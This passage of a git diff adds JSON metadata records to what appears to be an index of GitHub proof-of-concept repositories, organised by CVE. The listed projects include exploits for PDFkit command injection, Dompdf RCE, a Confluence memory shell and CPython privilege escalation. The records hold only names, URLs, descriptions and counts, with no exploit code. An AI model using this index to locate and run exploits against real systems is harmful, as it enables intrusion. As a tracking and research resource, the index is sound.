+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-25012.json b/2022/CVE-2022-25012.json
new file mode 100644
index 0000000000..fc6f843741
--- /dev/null
+++ b/2022/CVE-2022-25012.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 622083074,
+ "name": "CVE-2022-25012",
+ "full_name": "s3l33\/CVE-2022-25012",
+ "owner": {
+ "login": "s3l33",
+ "id": 60675004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60675004?v=4",
+ "html_url": "https:\/\/github.com\/s3l33"
+ },
+ "html_url": "https:\/\/github.com\/s3l33\/CVE-2022-25012",
+ "description": "Updated version of this weak password encryption script",
+ "fork": false,
+ "created_at": "2023-04-01T04:21:18Z",
+ "updated_at": "2024-06-02T22:36:28Z",
+ "pushed_at": "2023-04-01T04:38:18Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 652119686,
+ "name": "cve-2022-25012",
+ "full_name": "deathflash1411\/cve-2022-25012",
+ "owner": {
+ "login": "deathflash1411",
+ "id": 42869390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42869390?v=4",
+ "html_url": "https:\/\/github.com\/deathflash1411"
+ },
+ "html_url": "https:\/\/github.com\/deathflash1411\/cve-2022-25012",
+ "description": "Weak Password Encryption in Argus Surveillance DVR 4.0",
+ "fork": false,
+ "created_at": "2023-06-11T06:33:25Z",
+ "updated_at": "2023-12-14T17:44:08Z",
+ "pushed_at": "2023-06-11T13:23:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-25313.json b/2022/CVE-2022-25313.json
index a156488a02..ab0cd0b6a6 100644
--- a/2022/CVE-2022-25313.json
+++ b/2022/CVE-2022-25313.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 626759487,
+ "name": "external_expat-2.1.0_CVE-2022-25313",
+ "full_name": "Trinadh465\/external_expat-2.1.0_CVE-2022-25313",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_expat-2.1.0_CVE-2022-25313",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-12T05:30:46Z",
+ "updated_at": "2023-04-12T05:44:54Z",
+ "pushed_at": "2023-04-12T05:45:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-25315.json b/2022/CVE-2022-25315.json
index 83cf099ecb..96cea59a77 100644
--- a/2022/CVE-2022-25315.json
+++ b/2022/CVE-2022-25315.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 624274624,
+ "name": "external_expat_v2.1.0_CVE-2022-25315",
+ "full_name": "hshivhare67\/external_expat_v2.1.0_CVE-2022-25315",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/external_expat_v2.1.0_CVE-2022-25315",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T05:42:39Z",
+ "updated_at": "2023-04-06T05:49:21Z",
+ "pushed_at": "2023-04-06T05:49:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-25365.json b/2022/CVE-2022-25365.json
new file mode 100644
index 0000000000..5726318024
--- /dev/null
+++ b/2022/CVE-2022-25365.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 603748967,
+ "name": "CVE-2022-25365",
+ "full_name": "followboy1999\/CVE-2022-25365",
+ "owner": {
+ "login": "followboy1999",
+ "id": 4121091,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4121091?v=4",
+ "html_url": "https:\/\/github.com\/followboy1999"
+ },
+ "html_url": "https:\/\/github.com\/followboy1999\/CVE-2022-25365",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-19T13:19:10Z",
+ "updated_at": "2024-05-27T08:43:16Z",
+ "pushed_at": "2023-02-19T13:32:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-25765.json b/2022/CVE-2022-25765.json
index 22c009879f..a4a889bb35 100644
--- a/2022/CVE-2022-25765.json
+++ b/2022/CVE-2022-25765.json
@@ -129,6 +129,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 594688502,
+ "name": "PDFkit-CMD-Injection-CVE-2022-25765",
+ "full_name": "nikn0laty\/PDFkit-CMD-Injection-CVE-2022-25765",
+ "owner": {
+ "login": "nikn0laty",
+ "id": 96344826,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96344826?v=4",
+ "html_url": "https:\/\/github.com\/nikn0laty"
+ },
+ "html_url": "https:\/\/github.com\/nikn0laty\/PDFkit-CMD-Injection-CVE-2022-25765",
+ "description": "Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6",
+ "fork": false,
+ "created_at": "2023-01-29T10:36:40Z",
+ "updated_at": "2024-06-20T01:01:24Z",
+ "pushed_at": "2023-01-29T11:01:27Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 599828263,
"name": "exploit-CVE-2022-25765",
@@ -173,6 +203,46 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 604742294,
+ "name": "PDFkit-CMD-Injection",
+ "full_name": "lekosbelas\/PDFkit-CMD-Injection",
+ "owner": {
+ "login": "lekosbelas",
+ "id": 35641898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35641898?v=4",
+ "html_url": "https:\/\/github.com\/lekosbelas"
+ },
+ "html_url": "https:\/\/github.com\/lekosbelas\/PDFkit-CMD-Injection",
+ "description": "CVE-2022-25765 pdfkit 0.8.6 command injection.",
+ "fork": false,
+ "created_at": "2023-02-21T17:38:51Z",
+ "updated_at": "2023-03-04T10:34:21Z",
+ "pushed_at": "2023-02-22T11:55:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2022",
+ "25765",
+ "cmd",
+ "command",
+ "cve",
+ "exploit",
+ "injection",
+ "pdfkit",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 746721441,
"name": "CVE-2022-25765",
diff --git a/2022/CVE-2022-25845.json b/2022/CVE-2022-25845.json
index 03475bdcb2..77ab494ce1 100644
--- a/2022/CVE-2022-25845.json
+++ b/2022/CVE-2022-25845.json
@@ -29,6 +29,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 608248647,
+ "name": "CVE-2022-25845-exploit",
+ "full_name": "nerowander\/CVE-2022-25845-exploit",
+ "owner": {
+ "login": "nerowander",
+ "id": 98097702,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98097702?v=4",
+ "html_url": "https:\/\/github.com\/nerowander"
+ },
+ "html_url": "https:\/\/github.com\/nerowander\/CVE-2022-25845-exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-01T16:17:08Z",
+ "updated_at": "2023-12-11T10:32:55Z",
+ "pushed_at": "2023-03-01T16:28:40Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 749518886,
"name": "fastjson-tp1fn1",
diff --git a/2022/CVE-2022-2588.json b/2022/CVE-2022-2588.json
index 19d2c5ef25..25d027a381 100644
--- a/2022/CVE-2022-2588.json
+++ b/2022/CVE-2022-2588.json
@@ -208,5 +208,35 @@
"watchers": 10,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 611941666,
+ "name": "CVE-2022-2588",
+ "full_name": "dom4570\/CVE-2022-2588",
+ "owner": {
+ "login": "dom4570",
+ "id": 70895650,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70895650?v=4",
+ "html_url": "https:\/\/github.com\/dom4570"
+ },
+ "html_url": "https:\/\/github.com\/dom4570\/CVE-2022-2588",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-09T21:29:56Z",
+ "updated_at": "2023-03-09T21:30:56Z",
+ "pushed_at": "2023-03-09T21:30:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-25927.json b/2022/CVE-2022-25927.json
new file mode 100644
index 0000000000..802e72c753
--- /dev/null
+++ b/2022/CVE-2022-25927.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595917273,
+ "name": "cve-2022-25927",
+ "full_name": "masahiro331\/cve-2022-25927",
+ "owner": {
+ "login": "masahiro331",
+ "id": 20438853,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20438853?v=4",
+ "html_url": "https:\/\/github.com\/masahiro331"
+ },
+ "html_url": "https:\/\/github.com\/masahiro331\/cve-2022-25927",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-01T04:16:47Z",
+ "updated_at": "2023-02-01T04:18:02Z",
+ "pushed_at": "2023-02-01T04:17:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-2602.json b/2022/CVE-2022-2602.json
index dff253c146..6db1b79f1f 100644
--- a/2022/CVE-2022-2602.json
+++ b/2022/CVE-2022-2602.json
@@ -58,5 +58,35 @@
"watchers": 84,
"score": 0,
"subscribers_count": 4
+ },
+ {
+ "id": 586887875,
+ "name": "CVE-2022-2602-Study",
+ "full_name": "th3-5had0w\/CVE-2022-2602-Study",
+ "owner": {
+ "login": "th3-5had0w",
+ "id": 46859830,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46859830?v=4",
+ "html_url": "https:\/\/github.com\/th3-5had0w"
+ },
+ "html_url": "https:\/\/github.com\/th3-5had0w\/CVE-2022-2602-Study",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-09T13:21:02Z",
+ "updated_at": "2023-05-20T05:45:42Z",
+ "pushed_at": "2023-01-09T13:22:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-26134.json b/2022/CVE-2022-26134.json
index 76acb14050..e95c2f26bf 100644
--- a/2022/CVE-2022-26134.json
+++ b/2022/CVE-2022-26134.json
@@ -1788,6 +1788,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 589327553,
+ "name": "CVE-2022-26134_check",
+ "full_name": "cbk914\/CVE-2022-26134_check",
+ "owner": {
+ "login": "cbk914",
+ "id": 2042196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4",
+ "html_url": "https:\/\/github.com\/cbk914"
+ },
+ "html_url": "https:\/\/github.com\/cbk914\/CVE-2022-26134_check",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-15T20:11:27Z",
+ "updated_at": "2023-01-19T23:43:17Z",
+ "pushed_at": "2023-01-15T20:14:57Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 597319077,
+ "name": "CVE-2022-26134_Behinder_MemShell",
+ "full_name": "MaskCyberSecurityTeam\/CVE-2022-26134_Behinder_MemShell",
+ "owner": {
+ "login": "MaskCyberSecurityTeam",
+ "id": 107802263,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107802263?v=4",
+ "html_url": "https:\/\/github.com\/MaskCyberSecurityTeam"
+ },
+ "html_url": "https:\/\/github.com\/MaskCyberSecurityTeam\/CVE-2022-26134_Behinder_MemShell",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-04T06:51:47Z",
+ "updated_at": "2024-01-12T09:31:33Z",
+ "pushed_at": "2023-02-04T07:18:25Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 0
+ },
{
"id": 672663443,
"name": "Atlassian_CVE-2022-26134",
diff --git a/2022/CVE-2022-26265.json b/2022/CVE-2022-26265.json
index f68d54b825..5714dd9b30 100644
--- a/2022/CVE-2022-26265.json
+++ b/2022/CVE-2022-26265.json
@@ -35,5 +35,35 @@
"watchers": 10,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 623880121,
+ "name": "CVE-2022-26265",
+ "full_name": "redteamsecurity2023\/CVE-2022-26265",
+ "owner": {
+ "login": "redteamsecurity2023",
+ "id": 129942969,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129942969?v=4",
+ "html_url": "https:\/\/github.com\/redteamsecurity2023"
+ },
+ "html_url": "https:\/\/github.com\/redteamsecurity2023\/CVE-2022-26265",
+ "description": "The first proof of concept of the Contao CMS RCE",
+ "fork": false,
+ "created_at": "2023-04-05T09:34:29Z",
+ "updated_at": "2023-04-05T09:37:01Z",
+ "pushed_at": "2023-04-05T09:36:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-26485.json b/2022/CVE-2022-26485.json
new file mode 100644
index 0000000000..5cb3d9b5eb
--- /dev/null
+++ b/2022/CVE-2022-26485.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595523904,
+ "name": "CVE-2022-26485",
+ "full_name": "mistymntncop\/CVE-2022-26485",
+ "owner": {
+ "login": "mistymntncop",
+ "id": 105329747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4",
+ "html_url": "https:\/\/github.com\/mistymntncop"
+ },
+ "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-26485",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-31T09:01:17Z",
+ "updated_at": "2024-05-15T06:21:26Z",
+ "pushed_at": "2023-01-31T09:10:21Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-26488.json b/2022/CVE-2022-26488.json
new file mode 100644
index 0000000000..88c0bede41
--- /dev/null
+++ b/2022/CVE-2022-26488.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 633237667,
+ "name": "PyPATHPwner",
+ "full_name": "techspence\/PyPATHPwner",
+ "owner": {
+ "login": "techspence",
+ "id": 7014376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7014376?v=4",
+ "html_url": "https:\/\/github.com\/techspence"
+ },
+ "html_url": "https:\/\/github.com\/techspence\/PyPATHPwner",
+ "description": "POC Exploit for CVE-2022-26488 - Python for Windows (CPython) escalation of privilege vulnerability, discovered by the Lockheed Martin Red Team.",
+ "fork": false,
+ "created_at": "2023-04-27T04:30:29Z",
+ "updated_at": "2023-08-17T16:20:03Z",
+ "pushed_at": "2023-04-27T04:35:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-26923.json b/2022/CVE-2022-26923.json
index bb09acf5ab..e9a0fac569 100644
--- a/2022/CVE-2022-26923.json
+++ b/2022/CVE-2022-26923.json
@@ -103,10 +103,10 @@
"description": "检测域内常见一把梭漏洞,包括:NoPac、ZeroLogon、CVE-2022-26923、PrintNightMare",
"fork": false,
"created_at": "2023-10-17T06:29:44Z",
- "updated_at": "2024-06-19T09:50:26Z",
+ "updated_at": "2024-06-26T06:29:29Z",
"pushed_at": "2023-10-23T04:47:11Z",
- "stargazers_count": 22,
- "watchers_count": 22,
+ "stargazers_count": 23,
+ "watchers_count": 23,
"has_discussions": false,
"forks_count": 6,
"allow_forking": true,
@@ -115,7 +115,7 @@
"topics": [],
"visibility": "public",
"forks": 6,
- "watchers": 22,
+ "watchers": 23,
"score": 0,
"subscribers_count": 2
},
diff --git a/2022/CVE-2022-27518.json b/2022/CVE-2022-27518.json
new file mode 100644
index 0000000000..ffdf881fc4
--- /dev/null
+++ b/2022/CVE-2022-27518.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 590162168,
+ "name": "CVE-2022-27518_POC",
+ "full_name": "dolby360\/CVE-2022-27518_POC",
+ "owner": {
+ "login": "dolby360",
+ "id": 22151399,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22151399?v=4",
+ "html_url": "https:\/\/github.com\/dolby360"
+ },
+ "html_url": "https:\/\/github.com\/dolby360\/CVE-2022-27518_POC",
+ "description": "A POC on how to exploit CVE-2022-27518 ",
+ "fork": false,
+ "created_at": "2023-01-17T19:40:04Z",
+ "updated_at": "2024-06-21T00:10:42Z",
+ "pushed_at": "2023-01-18T19:48:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-27666.json b/2022/CVE-2022-27666.json
index 0da9cccf77..c42a6770c7 100644
--- a/2022/CVE-2022-27666.json
+++ b/2022/CVE-2022-27666.json
@@ -28,5 +28,35 @@
"watchers": 204,
"score": 0,
"subscribers_count": 7
+ },
+ {
+ "id": 626171379,
+ "name": "cve-2022-27666-exploits",
+ "full_name": "Albocoder\/cve-2022-27666-exploits",
+ "owner": {
+ "login": "Albocoder",
+ "id": 11018611,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11018611?v=4",
+ "html_url": "https:\/\/github.com\/Albocoder"
+ },
+ "html_url": "https:\/\/github.com\/Albocoder\/cve-2022-27666-exploits",
+ "description": "There are 2 exploitation methods that exploit CVE-2022-27666. For more info on how to use these code bases please check my blog.",
+ "fork": false,
+ "created_at": "2023-04-11T00:12:33Z",
+ "updated_at": "2024-02-15T20:16:05Z",
+ "pushed_at": "2023-04-11T00:27:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-28346.json b/2022/CVE-2022-28346.json
index ad5cc0eb0c..235c9434a8 100644
--- a/2022/CVE-2022-28346.json
+++ b/2022/CVE-2022-28346.json
@@ -59,6 +59,36 @@
"score": 0,
"subscribers_count": 3
},
+ {
+ "id": 609374925,
+ "name": "CVE-2022-28346",
+ "full_name": "vincentinttsh\/CVE-2022-28346",
+ "owner": {
+ "login": "vincentinttsh",
+ "id": 14941597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941597?v=4",
+ "html_url": "https:\/\/github.com\/vincentinttsh"
+ },
+ "html_url": "https:\/\/github.com\/vincentinttsh\/CVE-2022-28346",
+ "description": "An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.",
+ "fork": false,
+ "created_at": "2023-03-04T01:43:58Z",
+ "updated_at": "2022-08-24T08:06:59Z",
+ "pushed_at": "2022-05-15T00:53:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 745257468,
"name": "CVE-2022-28346",
diff --git a/2022/CVE-2022-28368.json b/2022/CVE-2022-28368.json
index c0112dede8..dd9cda449a 100644
--- a/2022/CVE-2022-28368.json
+++ b/2022/CVE-2022-28368.json
@@ -33,5 +33,65 @@
"watchers": 16,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 633796587,
+ "name": "CVE-2022-28368-handler",
+ "full_name": "That-Guy-Steve\/CVE-2022-28368-handler",
+ "owner": {
+ "login": "That-Guy-Steve",
+ "id": 130059785,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130059785?v=4",
+ "html_url": "https:\/\/github.com\/That-Guy-Steve"
+ },
+ "html_url": "https:\/\/github.com\/That-Guy-Steve\/CVE-2022-28368-handler",
+ "description": "This repository contains a python script that will handle the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request",
+ "fork": false,
+ "created_at": "2023-04-28T09:49:05Z",
+ "updated_at": "2023-04-28T12:42:28Z",
+ "pushed_at": "2023-04-28T12:57:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 637435384,
+ "name": "Dompdf-Exploit-RCE",
+ "full_name": "Henryisnotavailable\/Dompdf-Exploit-RCE",
+ "owner": {
+ "login": "Henryisnotavailable",
+ "id": 112469853,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112469853?v=4",
+ "html_url": "https:\/\/github.com\/Henryisnotavailable"
+ },
+ "html_url": "https:\/\/github.com\/Henryisnotavailable\/Dompdf-Exploit-RCE",
+ "description": "An exploit script for CVE-2022-28368 designed to make exploitation less annoying, made for a HTB machine",
+ "fork": false,
+ "created_at": "2023-05-07T14:49:38Z",
+ "updated_at": "2023-05-07T14:51:35Z",
+ "pushed_at": "2023-05-07T15:39:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-28672.json b/2022/CVE-2022-28672.json
index f77b40cb19..ff9017bd9e 100644
--- a/2022/CVE-2022-28672.json
+++ b/2022/CVE-2022-28672.json
@@ -39,5 +39,35 @@
"watchers": 116,
"score": 0,
"subscribers_count": 2
+ },
+ {
+ "id": 584971290,
+ "name": "CVE-2022-28672",
+ "full_name": "fastmo\/CVE-2022-28672",
+ "owner": {
+ "login": "fastmo",
+ "id": 53575270,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53575270?v=4",
+ "html_url": "https:\/\/github.com\/fastmo"
+ },
+ "html_url": "https:\/\/github.com\/fastmo\/CVE-2022-28672",
+ "description": " CVE-2022-28672 Vulnerabilidad Foxit PDF Reader - UaF - RCE - JIT Spraying",
+ "fork": false,
+ "created_at": "2023-01-04T01:39:04Z",
+ "updated_at": "2023-01-04T02:03:45Z",
+ "pushed_at": "2023-01-04T02:04:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-29170.json b/2022/CVE-2022-29170.json
new file mode 100644
index 0000000000..41ca2ab2d5
--- /dev/null
+++ b/2022/CVE-2022-29170.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 594668634,
+ "name": "CVE-2022-29170",
+ "full_name": "yijikeji\/CVE-2022-29170",
+ "owner": {
+ "login": "yijikeji",
+ "id": 42433368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42433368?v=4",
+ "html_url": "https:\/\/github.com\/yijikeji"
+ },
+ "html_url": "https:\/\/github.com\/yijikeji\/CVE-2022-29170",
+ "description": "Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-29T09:10:44Z",
+ "updated_at": "2023-02-20T13:57:30Z",
+ "pushed_at": "2022-12-29T07:40:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-29361.json b/2022/CVE-2022-29361.json
index c21f726576..ec2ebd12f5 100644
--- a/2022/CVE-2022-29361.json
+++ b/2022/CVE-2022-29361.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 625487881,
+ "name": "Werkzeug-CVE-2022-29361-PoC",
+ "full_name": "kevin-mizu\/Werkzeug-CVE-2022-29361-PoC",
+ "owner": {
+ "login": "kevin-mizu",
+ "id": 48991194,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48991194?v=4",
+ "html_url": "https:\/\/github.com\/kevin-mizu"
+ },
+ "html_url": "https:\/\/github.com\/kevin-mizu\/Werkzeug-CVE-2022-29361-PoC",
+ "description": null,
+ "fork": false,
